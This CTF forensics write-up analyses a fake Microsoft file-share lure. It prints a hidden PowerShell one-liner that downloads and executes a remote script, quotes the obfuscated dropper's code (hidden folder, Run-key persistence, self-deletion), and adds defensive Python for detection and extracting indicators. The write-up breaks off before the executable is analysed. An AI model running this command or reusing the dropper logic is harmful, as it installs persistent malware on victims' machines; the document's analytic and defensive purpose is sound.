Category: forensics
Published: July 29, 2025
Competition: WWFCTF
Points: 481
Author: serioton

[WWFCTF] Forensics - Silver Moon Writeup

[Image: challenge description]

Before we continue, I wanna thank the WWF team for the amazing challenges.

🧩 Challenge Summary:

We're given a suspicious-looking URL that resembles a Microsoft file share, in the style of the campaigns currently going around (like the CAPTCHA malware lures). The page instructs the user to paste a PowerShell command directly into Windows File Explorer.

[Image: challenge URL]

Here's the command that gets copied:

```powershell
powershell -ep bypass -w hidden IEX(New-ObjEct System.Net.Webclient).Downloadstring('https://powershell.wwctf.com/update.ps1') # C:\HR\Application.docx
```

This command:

- Bypasses execution policy restrictions (`-ep bypass`)
- Hides the window (`-w hidden`)
- Executes in memory (via `IEX` with `DownloadString`, so the script never has to touch disk first)
- Ends with a comment (`# C:\HR\Application.docx`) that PowerShell ignores; it only makes the pasted text look like a document path
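As an added example (not part of the original writeup), here is a small Python triage script that scores process-creation command lines for the traits listed above. The matching is deliberately case-insensitive, because the lure mixes case (`New-ObjEct`, `Downloadstring`) to slip past naive string filters. The event records, field names, rule names and the score threshold are this example's own constructed choices, modelled loosely on Sysmon process-creation fields.

```python
"""Flag ClickFix-style PowerShell one-liners in process-creation events.

Added example for this writeup, not part of the original post. The event
records below are constructed (not real telemetry); field names, rule names
and the threshold are this example's own choices.
"""
import re

# Each rule: (name, regex). Everything is matched case-insensitively because
# the sample mixes case ("New-ObjEct", "Downloadstring") to dodge naive filters.
RULES = [
    ("exec-policy-bypass", r"-(?:ep|executionpolicy)\s+bypass"),
    ("hidden-window",      r"-w(?:indowstyle)?\s+hidden"),
    ("iex",                r"\b(?:iex|invoke-expression)\b"),
    ("downloadstring",     r"downloadstring\s*\("),
    ("webclient",          r"net\.webclient"),
    # A trailing "# <document path>" is cosmetic: PowerShell ignores the
    # comment, it only makes the pasted text look like a path in Explorer.
    ("path-disguise",      r"#\s*[a-z]:\\[^\s]*\.(?:docx?|pdf|xlsx?)\s*$"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]


def score_command(cmdline, parent_image=""):
    """Return (score, hits) for one command line. Score >= 3 is suspicious here."""
    hits = [name for name, rx in COMPILED if rx.search(cmdline)]
    # PowerShell spawned directly by explorer.exe fits the "paste it into File
    # Explorer" lure; it adds weight but is not required on its own.
    if hits and parent_image.lower().endswith("explorer.exe"):
        hits.append("parent-explorer")
    return len(hits), hits


def triage(events):
    """events: dicts with CommandLine and optional ParentImage; returns flagged ones."""
    flagged = []
    for ev in events:
        score, hits = score_command(ev["CommandLine"], ev.get("ParentImage", ""))
        if score >= 3:
            flagged.append({**ev, "score": score, "hits": hits})
    return flagged


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # the lure from the challenge, as it would appear in a process-creation log
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": (r"powershell -ep bypass -w hidden IEX(New-ObjEct System.Net.Webclient)"
                        r".Downloadstring('https://powershell.wwctf.com/update.ps1') "
                        r"# C:\HR\Application.docx"),
    },
    {   # benign administrative usage: bypass alone is not enough to flag
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # an interactive shell started from the desktop
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe",
    },
]

if __name__ == "__main__":
    for ev in triage(SAMPLE_EVENTS):
        print(ev["score"], ev["hits"])
```

Only the first event crosses the threshold; the benign `-ExecutionPolicy Bypass -File` invocation scores 1 and is left alone, which is the point of scoring several traits together rather than alerting on any one of them.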

📜 Investigating update.ps1

Visiting the file the command tries to download, https://powershell.wwctf.com/update.ps1, lets us view the PowerShell source in the browser without saving it locally.

✅ Step 1: Understand the Logic

For now we can ignore the huge base64 blob and look at the readable (non-base64) part of the script:

```powershell
$kXVWlUwNPEw=@("asd==")-join'';$SAlaAox=$kXVWlUwNPEw;$hLXHNNQnb=[Convert]::FromBase64String($SAlaAox);$geMBPeaVORuLk=[System.Text.Encoding]::UTF8.GetString($hLXHNNQnb);$geMBPeaVORuLk=ConvertFrom-Json $geMBPeaVORuLk;$ZhWOQbu=("{0}{1}{2}"-f'J1','Csum','3Dcj');$ALMVCnyJSuzBnE=Join-Path $env:USERPROFILE ((("{3}{0}{2}{1}{4}"-f'ts','J1Cs','G1t','Documen','um3Dcj')) -crEPLAce ([chaR]71+[chaR]49+[chaR]116),[chaR]92);if(-not (Test-Path $ALMVCnyJSuzBnE)){New-Item -ItemType Directory -Path $ALMVCnyJSuzBnE|Out-Null;(Get-Item $ALMVCnyJSuzBnE).Attributes += ("{0}{1}{2}" -f 'H','idd','en'),("{0}{1}"-f 'Sys','tem')};foreach($file in $geMBPeaVORuLk.aixrdrPVmiaT){; $p=Join-Path $ALMVCnyJSuzBnE $file.bHSoyPyFwZgB; [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String($file.PthYIs));};Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 4);$EHPoSQvgWxy=[IO.Path]::ChangeExtension([IO.Path]::GetTempFileName(),'cmd');[IO.File]::WriteAllText($EHPoSQvgWxy, ((("{13}{6}{25}{10}{23}{9}{3}{21}{18}{12}{1}{4}{2}{11}{14}{0}{16}{8}{17}{20}{24}{22}{15}{5}{7}{26}{19}"-f'yJ1Csum3DcjDuy','LE%Du','umen','A','yDoc','
del U',' ','AC%~','pdate','AC /b U','start UA','t','RPROFI','@echo','sDu','
','u','.e','SE','AC','x','C%U','UAC','CU','e','off

','f0U')).rEPLaCe(([cHAr]85+[cHAr]65+[cHAr]67),[sTRIng][cHAr]34).rEPLaCe(([cHAr]68+[cHAr]117+[cHAr]121),[sTRIng][cHAr]92)));Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 4);Set-ItemProperty -Path ((("{8}{2}{5}{1}{0}{6}{3}{7}{4}"-f'ows{0}C','d','oftwar','rr','Version{0}Run','e{0}Microsoft{0}Win','u','ent','HKCU:{0}S')) -F[char]92) -Name ("{2}{0}{1}"-f 'Ao','prv','l') -Value "$env:USERPROFILE\Documents\J1Csum3Dcj\update.exe";Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 4);$ws=New-Object -ComObject WScript.Shell;$ws.Run($EHPoSQvgWxy,0,$false);Remove-Item $MyInvocation.MyCommand.Path -Force
```

(The `"asd=="` in the first line stands in for the real base64 blob, which has been cut from the excerpt; the embedded line breaks inside the quoted format arguments are part of the script.)

We could read through it by hand, but since it's obfuscated we can just paste it into ChatGPT and get a short explanation of what it does:

> This PowerShell script is a malicious dropper that first creates a hidden, system-attributed directory (J1Csum3Dcj in Documents). It then (assuming valid input for $geMBPeaVORuLk) decodes and writes an executable (e.g., update.exe) into this hidden directory. Next, it sets a Registry Run key so the executable launches automatically at every user login, ensuring persistence. It creates and executes a temporary, hidden .cmd file designed to silently run the dropped executable (potentially attempting a UAC bypass). Finally, the original PowerShell script deletes itself to remove traces. Its purpose is to silently install and execute malware, establish persistence, and hide its presence.

This is a full-fledged dropper, designed to install malware and stay hidden.
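The obfuscation is only string formatting: every path is a `-f` template whose pieces have been shuffled, and the separator characters are built from `[char]` codes and swapped in afterwards. The following Python script, added here and not taken from the writeup or the challenge, replays those operations on the templates copied from the excerpt above to recover the concrete indicators: the hidden folder, the Run key and value name, and the contents of the temporary `.cmd` launcher. It also shows that the `UAC` token the ChatGPT summary reads as a UAC bypass attempt is just a placeholder that `.Replace` turns into a double quote (`[char]34`): the batch file merely starts `update.exe` in the background and deletes itself. Helper names are this example's own, and newlines inside the template arguments are taken as they appear on the page.

```python
"""Recover the dropper's indicators by replaying its string-formatting tricks.

Added example for this writeup, not code from the post or the challenge. The
templates and argument lists are copied from the update.ps1 excerpt; helper
names are this example's own, and newlines inside arguments are taken as they
appear on the page.
"""


def ps_format(template, args):
    """Emulate PowerShell's -f operator for purely positional {n} templates."""
    return template.format(*args)


def char_code_replace(text, old_codes, new_codes):
    """Emulate .Replace(([char]a+[char]b+...), [string][char]c).

    The script's -crEPLAce is a regex replace, but "G1t" has no metacharacters,
    so a plain replace is equivalent.
    """
    old = "".join(chr(c) for c in old_codes)
    new = "".join(chr(c) for c in new_codes)
    return text.replace(old, new)


def recover_drop_directory():
    """The Hidden+System folder created under $env:USERPROFILE."""
    rel = ps_format("{3}{0}{2}{1}{4}", ["ts", "J1Cs", "G1t", "Documen", "um3Dcj"])
    # -crEPLAce ([chaR]71+[chaR]49+[chaR]116),[chaR]92  ->  "G1t" becomes "\"
    return char_code_replace(rel, [71, 49, 116], [92])


def recover_run_key():
    """The registry autorun location and value name used for persistence."""
    path_tpl = ps_format("{8}{2}{5}{1}{0}{6}{3}{7}{4}",
                         ["ows{0}C", "d", "oftwar", "rr", "Version{0}Run",
                          "e{0}Microsoft{0}Win", "u", "ent", "HKCU:{0}S"])
    path = ps_format(path_tpl, [chr(92)])  # the outer -F [char]92 fills in "\"
    name = ps_format("{2}{0}{1}", ["Ao", "prv", "l"])
    return path, name


def recover_cmd_file():
    """The batch file written to %TEMP% and launched via WScript.Shell."""
    tpl = ("{13}{6}{25}{10}{23}{9}{3}{21}{18}{12}{1}{4}{2}{11}{14}{0}{16}{8}"
           "{17}{20}{24}{22}{15}{5}{7}{26}{19}")
    args = ["yJ1Csum3DcjDuy", "LE%Du", "umen", "A", "yDoc", "\ndel U", " ",
            "AC%~", "pdate", "AC /b U", "start UA", "t", "RPROFI", "@echo",
            "sDu", "\n", "u", ".e", "SE", "AC", "x", "C%U", "UAC", "CU", "e",
            "off\n\n", "f0U"]
    text = ps_format(tpl, args)
    text = char_code_replace(text, [85, 65, 67], [34])    # "UAC" -> "
    text = char_code_replace(text, [68, 117, 121], [92])  # "Duy" -> \
    return text


def indicators():
    """Everything a defender would hunt for, in one place."""
    run_path, run_name = recover_run_key()
    drop_dir = "%USERPROFILE%\\" + recover_drop_directory()
    return {
        "drop_dir": drop_dir,
        "dropped_exe": drop_dir + "\\update.exe",
        "run_key": run_path,
        "run_value_name": run_name,
        "launcher_cmd": recover_cmd_file(),
    }


if __name__ == "__main__":
    for key, value in indicators().items():
        print(f"{key}: {value!r}")
```

Running it yields `%USERPROFILE%\Documents\J1Csum3Dcj\update.exe` as the dropped binary, `HKCU:\Software\Microsoft\Windows\CurrentVersion\Run` with value name `lAoprv` as the persistence point, and a three-command batch file (`@echo off`, `start "" /b "...\update.exe"`, `del "%~f0"`). Those are the artifacts to check on a suspected host and the values to feed into a hunt query.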

🔬 Step 2: Extract the Payload (Executable)

Back to the big base64 blob (likely representing the dropped EXE)


1. Copy the entire base64 section from update.ps1
2. Head over to CyberChef
3. Use the operation: From Base64

[Image: entire base64 section decoded from update.ps1]

Now we’ve got the binary payload.

1. Copy the entire base64 section again
2. Use the same operation: From Base64
3. Save the output as update.exe (or whatever it decodes to)
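The CyberChef route works, but the script itself tells us the layout of the blob: it base64-decodes it, parses the result as JSON, and walks `$geMBPeaVORuLk.aixrdrPVmiaT`, writing each entry's `PthYIs` (base64 file contents) to a file named by `bHSoyPyFwZgB`. The Python below, added here and not the author's tooling, does the same extraction programmatically but only hashes and inspects the decoded bytes instead of writing or running them. The field names come from the excerpt; the blob it decodes is a constructed stand-in (the writeup shows the real one only as the placeholder `"asd=="`), and the fake payload is just an `MZ` header with filler.

```python
"""Extract the dropped files from the JSON the dropper decodes, without running them.

Added example for this writeup (not the author's tooling). The JSON field names
come from the update.ps1 excerpt ($geMBPeaVORuLk.aixrdrPVmiaT, .bHSoyPyFwZgB,
.PthYIs); the sample blob below is constructed and stands in for the real base64
section, which the writeup shows only as the placeholder "asd==".
"""
import base64
import binascii
import hashlib
import json

FILES_KEY, NAME_KEY, DATA_KEY = "aixrdrPVmiaT", "bHSoyPyFwZgB", "PthYIs"


def decode_blob(blob):
    """Base64-decode the script's blob into the object it passes to ConvertFrom-Json."""
    raw = base64.b64decode(blob, validate=True)
    return json.loads(raw.decode("utf-8"))


def extract_files(obj):
    """Return metadata for each embedded file; bytes are hashed, never executed."""
    out = []
    for entry in obj[FILES_KEY]:
        name = entry[NAME_KEY]
        try:
            data = base64.b64decode(entry[DATA_KEY], validate=True)
        except binascii.Error:
            out.append({"name": name, "error": "invalid base64"})
            continue
        out.append({
            "name": name,
            "size": len(data),
            "is_pe": data[:2] == b"MZ",  # DOS header magic; a cheap sanity check
            "sha256": hashlib.sha256(data).hexdigest(),  # look this up before uploading
        })
    return out


# Constructed stand-in: one fake "update.exe" whose bytes start with the MZ magic.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"fake-pe-body"
SAMPLE_JSON = {FILES_KEY: [{NAME_KEY: "update.exe",
                            DATA_KEY: base64.b64encode(FAKE_PE).decode()}]}
SAMPLE_BLOB = base64.b64encode(json.dumps(SAMPLE_JSON).encode()).decode()

if __name__ == "__main__":
    for info in extract_files(decode_blob(SAMPLE_BLOB)):
        print(info)
```

To use it on the real sample, replace `SAMPLE_BLOB` with the blob copied from `update.ps1`; the SHA-256 it prints is what you would search on VirusTotal before deciding whether the file needs to be uploaded at all.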

[Image: second base64 blob decoded binary]

📜 Analyzing the Executable

At this point, we can analyze the exe in three ways:

  1. Upload update.exe to VirusTotal (or look up its hash first, so the sample is not shared unnecessarily).
  2. Use Ghidra or IDA Free to reverse engineer it statically.
  3. Run the executable in an isolated sandbox so it unpacks itself, then analyze the result.

To be continued...
